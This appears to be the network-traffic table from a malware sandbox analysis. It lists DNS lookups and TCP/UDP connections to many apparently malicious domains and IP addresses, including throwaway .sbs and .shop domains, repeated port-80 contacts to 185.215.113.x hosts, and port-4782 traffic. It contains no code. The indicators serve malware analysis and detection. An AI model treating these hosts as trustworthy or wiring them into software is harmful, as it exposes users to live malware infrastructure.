| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| US | 8.8.8.8:53 | 17.113.215.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | push-hook.cyou | udp |
| US | 104.21.10.6:443 | push-hook.cyou | tcp |
| US | 8.8.8.8:53 | processhol.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | librari-night.sbs | udp |
| US | 8.8.8.8:53 | befall-sm0ker.sbs | udp |
| US | 8.8.8.8:53 | 6.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | p10tgrace.sbs | udp |
| US | 8.8.8.8:53 | peepburry828.sbs | udp |
| US | 8.8.8.8:53 | owner-vacat10n.sbs | udp |
| US | 8.8.8.8:53 | 3xp3cts1aim.sbs | udp |
| US | 8.8.8.8:53 | p3ar11fter.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | 80.160.67.172.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| TH | 45.141.26.170:80 | 45.141.26.170 | tcp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 170.26.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.235.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SY | 5.134.254.142:40500 | tcp | |
| UZ | 213.230.108.92:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.108.230.213.in-addr.arpa | udp |
| SG | 35.185.187.24:80 | 35.185.187.24 | tcp |
| US | 8.8.8.8:53 | 24.187.185.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 188.215.221.55:40500 | udp | |
| US | 8.8.8.8:53 | 55.221.215.188.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| MX | 189.167.44.219:40500 | udp | |
| TH | 45.141.26.170:7000 | tcp | |
| US | 8.8.8.8:53 | 219.44.167.189.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | reinforcenh.shop | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | gutterydhowi.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | ghostreedmnu.shop | udp |
| US | 8.8.8.8:53 | offensivedzvju.shop | udp |
| US | 8.8.8.8:53 | vozmeatillu.shop | udp |
| IR | 91.185.146.150:40500 | udp | |
| US | 8.8.8.8:53 | 150.146.185.91.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | drawzhotdog.shop | udp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| US | 8.8.8.8:53 | fragnantbui.shop | udp |
| US | 8.8.8.8:53 | stogeneratmns.shop | udp |
| US | 8.8.8.8:53 | reinforcenh.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| MX | 189.133.11.24:40500 | udp | |
| US | 8.8.8.8:53 | 24.11.133.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.206.44.35:40500 | udp | |
| US | 8.8.8.8:53 | 35.44.206.213.in-addr.arpa | udp |
| UZ | 213.230.99.119:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| DE | 85.10.193.220:80 | tcp | |
| UZ | 195.158.22.4:40500 | udp | |
| US | 8.8.8.8:53 | 220.193.10.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.22.158.195.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.97.138:40500 | udp | |
| US | 8.8.8.8:53 | 138.97.230.213.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 90.156.163.33:40500 | udp | |
| US | 8.8.8.8:53 | 33.163.156.90.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 89.218.186.142:40500 | udp | |
| US | 8.8.8.8:53 | 142.186.218.89.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 93.123.145.179:40500 | udp | |
| US | 8.8.8.8:53 | 179.145.123.93.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| EG | 62.114.143.56:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.249.62.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.62.249.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.179.117.33:40500 | udp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| KZ | 5.63.94.144:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 144.94.63.5.in-addr.arpa | udp |
| UZ | 90.156.164.28:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.249.62.94:40500 | udp | |
| US | 8.8.8.8:53 | 94.62.249.89.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | home.sevkk17vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| MX | 189.136.17.247:40500 | udp | |
| US | 8.8.8.8:53 | 247.17.136.189.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.218.158:40500 | udp | |
| US | 8.8.8.8:53 | 158.218.236.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 37.78.33.95:40500 | udp | |
| US | 8.8.8.8:53 | 95.33.78.37.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| KZ | 178.91.28.42:40500 | udp | |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.28.91.178.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| MX | 201.138.180.213:40500 | tcp | |
| YE | 46.35.84.77:40500 | udp | |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 8.8.8.8:53 | blade-govern.sbs | udp |
| US | 104.21.80.208:443 | blade-govern.sbs | tcp |
| US | 8.8.8.8:53 | 77.84.35.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | story-tense-faz.sbs | udp |
| US | 104.21.1.25:443 | story-tense-faz.sbs | tcp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| US | 8.8.8.8:53 | disobey-curly.sbs | udp |
| US | 104.21.70.128:443 | disobey-curly.sbs | tcp |
| US | 8.8.8.8:53 | 25.1.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | motion-treesz.sbs | udp |
| US | 104.21.94.231:443 | motion-treesz.sbs | tcp |
| US | 8.8.8.8:53 | powerful-avoids.sbs | udp |
| US | 172.67.187.4:443 | powerful-avoids.sbs | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 128.70.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| KZ | 37.151.73.50:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 50.73.151.37.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 95.59.171.222:40500 | udp | |
| US | 8.8.8.8:53 | 222.171.59.95.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.185.189.167:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 167.189.185.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 104.21.80.208:443 | blade-govern.sbs | tcp |
| UZ | 90.156.161.82:40500 | udp | |
| US | 104.21.1.25:443 | story-tense-faz.sbs | tcp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| US | 104.21.70.128:443 | disobey-curly.sbs | tcp |
| US | 8.8.8.8:53 | 82.161.156.90.in-addr.arpa | udp |
| US | 104.21.94.231:443 | motion-treesz.sbs | tcp |
| US | 172.67.187.4:443 | powerful-avoids.sbs | tcp |
| US | 64.190.113.79:443 | tcp | |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| IR | 2.176.94.43:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 89.218.244.178:40500 | udp | |
| US | 8.8.8.8:53 | 178.244.218.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| EG | 197.121.126.87:40500 | udp | |
| US | 8.8.8.8:53 | 87.126.121.197.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 92.46.228.246:40500 | udp | |
| US | 8.8.8.8:53 | 246.228.46.92.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 185.71.153.146:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 146.153.71.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| PK | 39.48.235.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.235.48.39.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| UZ | 90.156.163.123:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 70.105.211.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| KZ | 89.218.186.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.186.218.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 90.156.162.106:40500 | udp | |
| US | 8.8.8.8:53 | 106.162.156.90.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| MX | 187.230.224.82:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 82.224.230.187.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 46.161.239.195:40500 | udp | |
| US | 8.8.8.8:53 | 195.239.161.46.in-addr.arpa | udp |
| IR | 5.202.242.190:40500 | tcp | |
| IR | 151.232.179.149:40500 | udp | |
| US | 8.8.8.8:53 | 149.179.232.151.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.69.230:40500 | udp | |
| US | 8.8.8.8:53 | 230.69.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| SY | 77.44.150.37:40500 | udp | |
| US | 8.8.8.8:53 | 37.150.44.77.in-addr.arpa | udp |
| NE | 41.138.38.164:40500 | udp | |
| US | 8.8.8.8:53 | 164.38.138.41.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| AM | 109.68.122.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.122.68.109.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| DE | 159.100.18.229:40500 | tcp | |
| US | 8.8.8.8:53 | 229.18.100.159.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.216.236.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| BG | 146.70.53.161:40500 | udp | |
| US | 8.8.8.8:53 | 161.53.70.146.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 31.8.29.135:40500 | tcp | |
| YE | 178.130.103.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.103.130.178.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.126.169:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 169.126.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 8.130.42.227:10001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 2.133.45.6:40500 | udp | |
| US | 8.8.8.8:53 | 6.45.133.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 93.188.86.253:40500 | udp | |
| US | 8.8.8.8:53 | 253.86.188.93.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 134.35.100.89:40500 | udp | |
| US | 8.8.8.8:53 | 89.100.35.134.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| SY | 77.44.228.98:40500 | tcp | |
| EG | 45.241.38.203:40500 | udp | |
| US | 8.8.8.8:53 | 203.38.241.45.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| GB | 79.133.176.200:80 | cdn.ly.9377.com | tcp |
| N/A | 192.168.1.13:5555 | tcp | |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 200.176.133.79.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | client.9377.com | udp |
| CN | 120.79.30.240:80 | client.9377.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| CN | 120.76.203.28:80 | client.9377.com | tcp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.python.org | udp |
| US | 151.101.128.223:443 | www.python.org | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 223.128.101.151.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 137.184.144.245:4782 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 64.190.113.79:443 | tcp | |
| CN | 112.74.95.85:8888 | tcp | |
| US | 8.8.8.8:53 | blasterrysbio.cyou | udp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.y2126.com | udp |
| UZ | 94.141.68.56:40500 | udp | |
| KZ | 95.58.91.70:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 56.68.141.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KR | 123.214.186.171:40500 | udp | |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.186.214.123.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| GE | 62.212.36.229:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 229.36.212.62.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | tmpfiles.org | udp |
| US | 172.67.195.247:443 | tmpfiles.org | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.26.2.16:443 | rentry.co | tcp |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 247.195.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.2.26.104.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| TJ | 109.74.69.43:40500 | udp | |
| US | 8.8.8.8:53 | 43.69.74.109.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| KZ | 92.47.143.122:40500 | udp | |
| US | 8.8.8.8:53 | 122.143.47.92.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 46.161.239.195:40500 | udp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| SY | 82.137.239.235:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| CI | 160.155.209.135:40500 | udp | |
| US | 8.8.8.8:53 | 135.209.155.160.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| TH | 154.197.69.165:80 | 154.197.69.165 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD | udp |
| TR | 85.103.235.188:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 188.235.103.85.in-addr.arpa | udp |
| CN | 111.231.145.137:8888 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 137.184.144.245:4782 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| SY | 95.212.18.228:40500 | udp | |
| US | 8.8.8.8:53 | 228.18.212.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 5.251.234.88:40500 | udp | |
| US | 8.8.8.8:53 | 88.234.251.5.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| TH | 154.197.69.165:7000 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.99.184:40500 | udp | |
| US | 8.8.8.8:53 | 184.99.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.181.30.194:40500 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| YE | 94.26.219.44:40500 | udp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.219.26.94.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 47.115.166.43:80 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| MX | 187.230.224.82:40500 | udp | |
| IR | 46.100.82.131:40500 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| KZ | 5.63.94.144:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 5.232.126.125:40500 | udp | |
| US | 8.8.8.8:53 | 125.126.232.5.in-addr.arpa | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 94.183.35.46:40500 | udp | |
| US | 8.8.8.8:53 | 46.35.183.94.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| MX | 189.167.5.148:40500 | udp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 148.5.167.189.in-addr.arpa | udp |
